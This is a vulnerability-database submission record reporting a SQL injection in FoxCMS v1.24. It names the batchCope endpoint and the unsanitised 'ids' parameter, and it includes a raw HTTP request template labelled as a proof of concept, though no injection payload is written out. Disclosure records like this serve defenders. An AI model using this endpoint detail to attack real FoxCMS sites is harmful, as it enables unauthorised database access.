| Title | 贵州黔狐科技股份有限公司 foxcms v1.24 SQL Injection |
|---|
| Description | In the batchCope method of foxcms, the ids parameters passed from the front end are not processed at all and are directly concatenated into the SQL statement. The SQL statement then performs an insertion operation, which leads to an sql injection vulnerability. The vulnerability corresponding interface for/admin3953 / images/batchCope. HTML, parameters for ids.Here is the POC:
POST /admin3953/images/batchCope.html HTTP/1.1
Host: www.foxcms.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:142.0) Gecko/20100101 Firefox/142.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 18
Origin: http://www.foxcms.com
Connection: close
Referer: http://www.foxcms.com/admin3953/article/index.html?columnId=8&bcid=1_8
Cookie: PHPSESSID=bf6a099242593444d6ab2d90da8244f1; access_127_0_0_1=1756266092
Priority: u=0
ids=62 |
|---|
| Source | ⚠️ https://github.com/ueh1013/VULN/issues/3 |
|---|
| User | jhsec.com (UID 89557) |
|---|
| Submission | 08/27/2025 14:42 (7 months ago) |
|---|
| Moderation | 09/11/2025 07:21 (15 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 323611 [FoxCMS up to 1.24 Images.php batchCope ids sql injection] |
|---|
| Points | 20 |
|---|